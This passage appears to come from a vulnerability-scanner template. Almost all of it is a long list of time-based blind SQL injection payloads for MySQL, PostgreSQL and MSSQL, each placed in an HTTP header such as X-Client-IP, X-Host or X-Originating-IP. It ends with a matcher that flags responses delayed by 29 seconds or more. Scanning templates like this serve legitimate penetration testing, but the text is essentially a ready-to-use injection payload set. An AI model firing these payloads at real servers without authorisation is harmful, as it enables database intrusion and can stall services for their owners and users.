		X-Requested-With: " or sleep(30)#
		X-Requested-With: ' or sleep(30)#
		X-Requested-With: " or sleep(30)="
		X-Requested-With: ' or sleep(30)='
		X-Requested-With: 1) or sleep(30)#
		X-Requested-With: ") or sleep(30)="
		X-Requested-With: ') or sleep(30)='
		X-Requested-With: 1)) or sleep(30)#
		X-Requested-With: ")) or sleep(30)="
		X-Requested-With: ')) or sleep(30)='
		X-Requested-With: ;waitfor delay '0:0:30'--
		X-Requested-With: );waitfor delay '0:0:30'--
		X-Requested-With: ';waitfor delay '0:0:30'--
		X-Requested-With: ";waitfor delay '0:0:30'--
		X-Requested-With: ');waitfor delay '0:0:30'--
		X-Requested-With: ");waitfor delay '0:0:30'--
		X-Requested-With: ));waitfor delay '0:0:30'--
		X-Requested-With: '));waitfor delay '0:0:30'--
		X-Requested-With: "));waitfor delay '0:0:30'--
		X-Requested-With: pg_sleep(30)--
		X-Requested-With: 1 or pg_sleep(30)--
		X-Requested-With: " or pg_sleep(30)--
		X-Requested-With: ' or pg_sleep(30)--
		X-Requested-With: 1) or pg_sleep(30)--
		X-Requested-With: ") or pg_sleep(30)--
		X-Requested-With: ') or pg_sleep(30)--
		X-Requested-With: 1)) or pg_sleep(30)--
		X-Requested-With: ")) or pg_sleep(30)--
		X-Requested-With: ')) or pg_sleep(30)--
		X-Requested-With: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Requested-With: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Requested-With: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Requested-With: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Requested-With: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Requested-With: SLEEP(30)#
		X-Requested-With: SLEEP(30)--
		X-Requested-With: SLEEP(30)="
		X-Requested-With: SLEEP(30)='
		X-Requested-With: or SLEEP(30)
		X-Requested-With: or SLEEP(30)#
		X-Requested-With: or SLEEP(30)--
		X-Requested-With: or SLEEP(30)="
		X-Requested-With: or SLEEP(30)='
		X-Requested-With: waitfor delay '00:00:30'
		X-Requested-With: waitfor delay '00:00:30'--
		X-Requested-With: waitfor delay '00:00:30'#
		X-Requested-With: pg_SLEEP(30)
		X-Requested-With: pg_SLEEP(30)--
		X-Requested-With: pg_SLEEP(30)#
		X-Requested-With: or pg_SLEEP(30)
		X-Requested-With: or pg_SLEEP(30)--
		X-Requested-With: or pg_SLEEP(30)#
		X-Requested-With: AnD SLEEP(30)
		X-Requested-With: AnD SLEEP(30)--
		X-Requested-With: AnD SLEEP(30)#
		X-Requested-With: &&SLEEP(30)
		X-Requested-With: &&SLEEP(30)--
		X-Requested-With: &&SLEEP(30)#
		X-Requested-With: ' AnD SLEEP(30) ANd '1
		X-Requested-With: '&&SLEEP(30)&&'1
		X-Requested-With: ORDER BY SLEEP(30)
		X-Requested-With: ORDER BY SLEEP(30)--
		X-Requested-With: ORDER BY SLEEP(30)#
		X-Requested-With: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Requested-With: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Requested-With: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Requested-With: + SLEEP(30) + '
		X-Requested-With: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Client-IP: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Client-IP: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Client-IP: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Client-IP: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Client-IP: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Client-IP: sleep(30)#
		X-Client-IP: (select * from (select(sleep(30)))a)
		X-Client-IP: 1 or sleep(30)#
		X-Client-IP: " or sleep(30)#
		X-Client-IP: ' or sleep(30)#
		X-Client-IP: " or sleep(30)="
		X-Client-IP: ' or sleep(30)='
		X-Client-IP: 1) or sleep(30)#
		X-Client-IP: ") or sleep(30)="
		X-Client-IP: ') or sleep(30)='
		X-Client-IP: 1)) or sleep(30)#
		X-Client-IP: ")) or sleep(30)="
		X-Client-IP: ')) or sleep(30)='
		X-Client-IP: ;waitfor delay '0:0:30'--
		X-Client-IP: );waitfor delay '0:0:30'--
		X-Client-IP: ';waitfor delay '0:0:30'--
		X-Client-IP: ";waitfor delay '0:0:30'--
		X-Client-IP: ');waitfor delay '0:0:30'--
		X-Client-IP: ");waitfor delay '0:0:30'--
		X-Client-IP: ));waitfor delay '0:0:30'--
		X-Client-IP: '));waitfor delay '0:0:30'--
		X-Client-IP: "));waitfor delay '0:0:30'--
		X-Client-IP: pg_sleep(30)--
		X-Client-IP: 1 or pg_sleep(30)--
		X-Client-IP: " or pg_sleep(30)--
		X-Client-IP: ' or pg_sleep(30)--
		X-Client-IP: 1) or pg_sleep(30)--
		X-Client-IP: ") or pg_sleep(30)--
		X-Client-IP: ') or pg_sleep(30)--
		X-Client-IP: 1)) or pg_sleep(30)--
		X-Client-IP: ")) or pg_sleep(30)--
		X-Client-IP: ')) or pg_sleep(30)--
		X-Client-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Client-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Client-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Client-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Client-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Client-IP: SLEEP(30)#
		X-Client-IP: SLEEP(30)--
		X-Client-IP: SLEEP(30)="
		X-Client-IP: SLEEP(30)='
		X-Client-IP: or SLEEP(30)
		X-Client-IP: or SLEEP(30)#
		X-Client-IP: or SLEEP(30)--
		X-Client-IP: or SLEEP(30)="
		X-Client-IP: or SLEEP(30)='
		X-Client-IP: waitfor delay '00:00:30'
		X-Client-IP: waitfor delay '00:00:30'--
		X-Client-IP: waitfor delay '00:00:30'#
		X-Client-IP: pg_SLEEP(30)
		X-Client-IP: pg_SLEEP(30)--
		X-Client-IP: pg_SLEEP(30)#
		X-Client-IP: or pg_SLEEP(30)
		X-Client-IP: or pg_SLEEP(30)--
		X-Client-IP: or pg_SLEEP(30)#
		X-Client-IP: AnD SLEEP(30)
		X-Client-IP: AnD SLEEP(30)--
		X-Client-IP: AnD SLEEP(30)#
		X-Client-IP: &&SLEEP(30)
		X-Client-IP: &&SLEEP(30)--
		X-Client-IP: &&SLEEP(30)#
		X-Client-IP: ' AnD SLEEP(30) ANd '1
		X-Client-IP: '&&SLEEP(30)&&'1
		X-Client-IP: ORDER BY SLEEP(30)
		X-Client-IP: ORDER BY SLEEP(30)--
		X-Client-IP: ORDER BY SLEEP(30)#
		X-Client-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Client-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Client-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Client-IP: + SLEEP(30) + '
		X-Client-IP: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Remote-IP: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Remote-IP: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Remote-IP: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Remote-IP: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Remote-IP: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Remote-IP: sleep(30)#
		X-Remote-IP: (select * from (select(sleep(30)))a)
		X-Remote-IP: 1 or sleep(30)#
		X-Remote-IP: " or sleep(30)#
		X-Remote-IP: ' or sleep(30)#
		X-Remote-IP: " or sleep(30)="
		X-Remote-IP: ' or sleep(30)='
		X-Remote-IP: 1) or sleep(30)#
		X-Remote-IP: ") or sleep(30)="
		X-Remote-IP: ') or sleep(30)='
		X-Remote-IP: 1)) or sleep(30)#
		X-Remote-IP: ")) or sleep(30)="
		X-Remote-IP: ')) or sleep(30)='
		X-Remote-IP: ;waitfor delay '0:0:30'--
		X-Remote-IP: );waitfor delay '0:0:30'--
		X-Remote-IP: ';waitfor delay '0:0:30'--
		X-Remote-IP: ";waitfor delay '0:0:30'--
		X-Remote-IP: ');waitfor delay '0:0:30'--
		X-Remote-IP: ");waitfor delay '0:0:30'--
		X-Remote-IP: ));waitfor delay '0:0:30'--
		X-Remote-IP: '));waitfor delay '0:0:30'--
		X-Remote-IP: "));waitfor delay '0:0:30'--
		X-Remote-IP: pg_sleep(30)--
		X-Remote-IP: 1 or pg_sleep(30)--
		X-Remote-IP: " or pg_sleep(30)--
		X-Remote-IP: ' or pg_sleep(30)--
		X-Remote-IP: 1) or pg_sleep(30)--
		X-Remote-IP: ") or pg_sleep(30)--
		X-Remote-IP: ') or pg_sleep(30)--
		X-Remote-IP: 1)) or pg_sleep(30)--
		X-Remote-IP: ")) or pg_sleep(30)--
		X-Remote-IP: ')) or pg_sleep(30)--
		X-Remote-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Remote-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Remote-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Remote-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Remote-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Remote-IP: SLEEP(30)#
		X-Remote-IP: SLEEP(30)--
		X-Remote-IP: SLEEP(30)="
		X-Remote-IP: SLEEP(30)='
		X-Remote-IP: or SLEEP(30)
		X-Remote-IP: or SLEEP(30)#
		X-Remote-IP: or SLEEP(30)--
		X-Remote-IP: or SLEEP(30)="
		X-Remote-IP: or SLEEP(30)='
		X-Remote-IP: waitfor delay '00:00:30'
		X-Remote-IP: waitfor delay '00:00:30'--
		X-Remote-IP: waitfor delay '00:00:30'#
		X-Remote-IP: pg_SLEEP(30)
		X-Remote-IP: pg_SLEEP(30)--
		X-Remote-IP: pg_SLEEP(30)#
		X-Remote-IP: or pg_SLEEP(30)
		X-Remote-IP: or pg_SLEEP(30)--
		X-Remote-IP: or pg_SLEEP(30)#
		X-Remote-IP: AnD SLEEP(30)
		X-Remote-IP: AnD SLEEP(30)--
		X-Remote-IP: AnD SLEEP(30)#
		X-Remote-IP: &&SLEEP(30)
		X-Remote-IP: &&SLEEP(30)--
		X-Remote-IP: &&SLEEP(30)#
		X-Remote-IP: ' AnD SLEEP(30) ANd '1
		X-Remote-IP: '&&SLEEP(30)&&'1
		X-Remote-IP: ORDER BY SLEEP(30)
		X-Remote-IP: ORDER BY SLEEP(30)--
		X-Remote-IP: ORDER BY SLEEP(30)#
		X-Remote-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Remote-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Remote-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Remote-IP: + SLEEP(30) + '
		X-Remote-IP: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Remote-Addr: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Remote-Addr: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Remote-Addr: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Remote-Addr: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Remote-Addr: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Remote-Addr: sleep(30)#
		X-Remote-Addr: (select * from (select(sleep(30)))a)
		X-Remote-Addr: 1 or sleep(30)#
		X-Remote-Addr: " or sleep(30)#
		X-Remote-Addr: ' or sleep(30)#
		X-Remote-Addr: " or sleep(30)="
		X-Remote-Addr: ' or sleep(30)='
		X-Remote-Addr: 1) or sleep(30)#
		X-Remote-Addr: ") or sleep(30)="
		X-Remote-Addr: ') or sleep(30)='
		X-Remote-Addr: 1)) or sleep(30)#
		X-Remote-Addr: ")) or sleep(30)="
		X-Remote-Addr: ')) or sleep(30)='
		X-Remote-Addr: ;waitfor delay '0:0:30'--
		X-Remote-Addr: );waitfor delay '0:0:30'--
		X-Remote-Addr: ';waitfor delay '0:0:30'--
		X-Remote-Addr: ";waitfor delay '0:0:30'--
		X-Remote-Addr: ');waitfor delay '0:0:30'--
		X-Remote-Addr: ");waitfor delay '0:0:30'--
		X-Remote-Addr: ));waitfor delay '0:0:30'--
		X-Remote-Addr: '));waitfor delay '0:0:30'--
		X-Remote-Addr: "));waitfor delay '0:0:30'--
		X-Remote-Addr: pg_sleep(30)--
		X-Remote-Addr: 1 or pg_sleep(30)--
		X-Remote-Addr: " or pg_sleep(30)--
		X-Remote-Addr: ' or pg_sleep(30)--
		X-Remote-Addr: 1) or pg_sleep(30)--
		X-Remote-Addr: ") or pg_sleep(30)--
		X-Remote-Addr: ') or pg_sleep(30)--
		X-Remote-Addr: 1)) or pg_sleep(30)--
		X-Remote-Addr: ")) or pg_sleep(30)--
		X-Remote-Addr: ')) or pg_sleep(30)--
		X-Remote-Addr: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Remote-Addr: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Remote-Addr: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Remote-Addr: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Remote-Addr: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Remote-Addr: SLEEP(30)#
		X-Remote-Addr: SLEEP(30)--
		X-Remote-Addr: SLEEP(30)="
		X-Remote-Addr: SLEEP(30)='
		X-Remote-Addr: or SLEEP(30)
		X-Remote-Addr: or SLEEP(30)#
		X-Remote-Addr: or SLEEP(30)--
		X-Remote-Addr: or SLEEP(30)="
		X-Remote-Addr: or SLEEP(30)='
		X-Remote-Addr: waitfor delay '00:00:30'
		X-Remote-Addr: waitfor delay '00:00:30'--
		X-Remote-Addr: waitfor delay '00:00:30'#
		X-Remote-Addr: pg_SLEEP(30)
		X-Remote-Addr: pg_SLEEP(30)--
		X-Remote-Addr: pg_SLEEP(30)#
		X-Remote-Addr: or pg_SLEEP(30)
		X-Remote-Addr: or pg_SLEEP(30)--
		X-Remote-Addr: or pg_SLEEP(30)#
		X-Remote-Addr: AnD SLEEP(30)
		X-Remote-Addr: AnD SLEEP(30)--
		X-Remote-Addr: AnD SLEEP(30)#
		X-Remote-Addr: &&SLEEP(30)
		X-Remote-Addr: &&SLEEP(30)--
		X-Remote-Addr: &&SLEEP(30)#
		X-Remote-Addr: ' AnD SLEEP(30) ANd '1
		X-Remote-Addr: '&&SLEEP(30)&&'1
		X-Remote-Addr: ORDER BY SLEEP(30)
		X-Remote-Addr: ORDER BY SLEEP(30)--
		X-Remote-Addr: ORDER BY SLEEP(30)#
		X-Remote-Addr: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Remote-Addr: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Remote-Addr: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Remote-Addr: + SLEEP(30) + '
		X-Remote-Addr: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Host: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Host: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Host: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Host: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Host: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Host: sleep(30)#
		X-Host: (select * from (select(sleep(30)))a)
		X-Host: 1 or sleep(30)#
		X-Host: " or sleep(30)#
		X-Host: ' or sleep(30)#
		X-Host: " or sleep(30)="
		X-Host: ' or sleep(30)='
		X-Host: 1) or sleep(30)#
		X-Host: ") or sleep(30)="
		X-Host: ') or sleep(30)='
		X-Host: 1)) or sleep(30)#
		X-Host: ")) or sleep(30)="
		X-Host: ')) or sleep(30)='
		X-Host: ;waitfor delay '0:0:30'--
		X-Host: );waitfor delay '0:0:30'--
		X-Host: ';waitfor delay '0:0:30'--
		X-Host: ";waitfor delay '0:0:30'--
		X-Host: ');waitfor delay '0:0:30'--
		X-Host: ");waitfor delay '0:0:30'--
		X-Host: ));waitfor delay '0:0:30'--
		X-Host: '));waitfor delay '0:0:30'--
		X-Host: "));waitfor delay '0:0:30'--
		X-Host: pg_sleep(30)--
		X-Host: 1 or pg_sleep(30)--
		X-Host: " or pg_sleep(30)--
		X-Host: ' or pg_sleep(30)--
		X-Host: 1) or pg_sleep(30)--
		X-Host: ") or pg_sleep(30)--
		X-Host: ') or pg_sleep(30)--
		X-Host: 1)) or pg_sleep(30)--
		X-Host: ")) or pg_sleep(30)--
		X-Host: ')) or pg_sleep(30)--
		X-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Host: SLEEP(30)#
		X-Host: SLEEP(30)--
		X-Host: SLEEP(30)="
		X-Host: SLEEP(30)='
		X-Host: or SLEEP(30)
		X-Host: or SLEEP(30)#
		X-Host: or SLEEP(30)--
		X-Host: or SLEEP(30)="
		X-Host: or SLEEP(30)='
		X-Host: waitfor delay '00:00:30'
		X-Host: waitfor delay '00:00:30'--
		X-Host: waitfor delay '00:00:30'#
		X-Host: pg_SLEEP(30)
		X-Host: pg_SLEEP(30)--
		X-Host: pg_SLEEP(30)#
		X-Host: or pg_SLEEP(30)
		X-Host: or pg_SLEEP(30)--
		X-Host: or pg_SLEEP(30)#
		X-Host: AnD SLEEP(30)
		X-Host: AnD SLEEP(30)--
		X-Host: AnD SLEEP(30)#
		X-Host: &&SLEEP(30)
		X-Host: &&SLEEP(30)--
		X-Host: &&SLEEP(30)#
		X-Host: ' AnD SLEEP(30) ANd '1
		X-Host: '&&SLEEP(30)&&'1
		X-Host: ORDER BY SLEEP(30)
		X-Host: ORDER BY SLEEP(30)--
		X-Host: ORDER BY SLEEP(30)#
		X-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Host: + SLEEP(30) + '
		X-Host: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Originating-IP: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Originating-IP: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Originating-IP: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Originating-IP: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Originating-IP: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Originating-IP: sleep(30)#
		X-Originating-IP: (select * from (select(sleep(30)))a)
		X-Originating-IP: 1 or sleep(30)#
		X-Originating-IP: " or sleep(30)#
		X-Originating-IP: ' or sleep(30)#
		X-Originating-IP: " or sleep(30)="
		X-Originating-IP: ' or sleep(30)='
		X-Originating-IP: 1) or sleep(30)#
		X-Originating-IP: ") or sleep(30)="
		X-Originating-IP: ') or sleep(30)='
		X-Originating-IP: 1)) or sleep(30)#
		X-Originating-IP: ")) or sleep(30)="
		X-Originating-IP: ')) or sleep(30)='
		X-Originating-IP: ;waitfor delay '0:0:30'--
		X-Originating-IP: );waitfor delay '0:0:30'--
		X-Originating-IP: ';waitfor delay '0:0:30'--
		X-Originating-IP: ";waitfor delay '0:0:30'--
		X-Originating-IP: ');waitfor delay '0:0:30'--
		X-Originating-IP: ");waitfor delay '0:0:30'--
		X-Originating-IP: ));waitfor delay '0:0:30'--
		X-Originating-IP: '));waitfor delay '0:0:30'--
		X-Originating-IP: "));waitfor delay '0:0:30'--
		X-Originating-IP: pg_sleep(30)--
		X-Originating-IP: 1 or pg_sleep(30)--
		X-Originating-IP: " or pg_sleep(30)--
		X-Originating-IP: ' or pg_sleep(30)--
		X-Originating-IP: 1) or pg_sleep(30)--
		X-Originating-IP: ") or pg_sleep(30)--
		X-Originating-IP: ') or pg_sleep(30)--
		X-Originating-IP: 1)) or pg_sleep(30)--
		X-Originating-IP: ")) or pg_sleep(30)--
		X-Originating-IP: ')) or pg_sleep(30)--
		X-Originating-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Originating-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Originating-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Originating-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Originating-IP: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Originating-IP: SLEEP(30)#
		X-Originating-IP: SLEEP(30)--
		X-Originating-IP: SLEEP(30)="
		X-Originating-IP: SLEEP(30)='
		X-Originating-IP: or SLEEP(30)
		X-Originating-IP: or SLEEP(30)#
		X-Originating-IP: or SLEEP(30)--
		X-Originating-IP: or SLEEP(30)="
		X-Originating-IP: or SLEEP(30)='
		X-Originating-IP: waitfor delay '00:00:30'
		X-Originating-IP: waitfor delay '00:00:30'--
		X-Originating-IP: waitfor delay '00:00:30'#
		X-Originating-IP: pg_SLEEP(30)
		X-Originating-IP: pg_SLEEP(30)--
		X-Originating-IP: pg_SLEEP(30)#
		X-Originating-IP: or pg_SLEEP(30)
		X-Originating-IP: or pg_SLEEP(30)--
		X-Originating-IP: or pg_SLEEP(30)#
		X-Originating-IP: AnD SLEEP(30)
		X-Originating-IP: AnD SLEEP(30)--
		X-Originating-IP: AnD SLEEP(30)#
		X-Originating-IP: &&SLEEP(30)
		X-Originating-IP: &&SLEEP(30)--
		X-Originating-IP: &&SLEEP(30)#
		X-Originating-IP: ' AnD SLEEP(30) ANd '1
		X-Originating-IP: '&&SLEEP(30)&&'1
		X-Originating-IP: ORDER BY SLEEP(30)
		X-Originating-IP: ORDER BY SLEEP(30)--
		X-Originating-IP: ORDER BY SLEEP(30)#
		X-Originating-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Originating-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Originating-IP: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Originating-IP: + SLEEP(30) + '
		X-Originating-IP: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		
	stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'duration>=29'
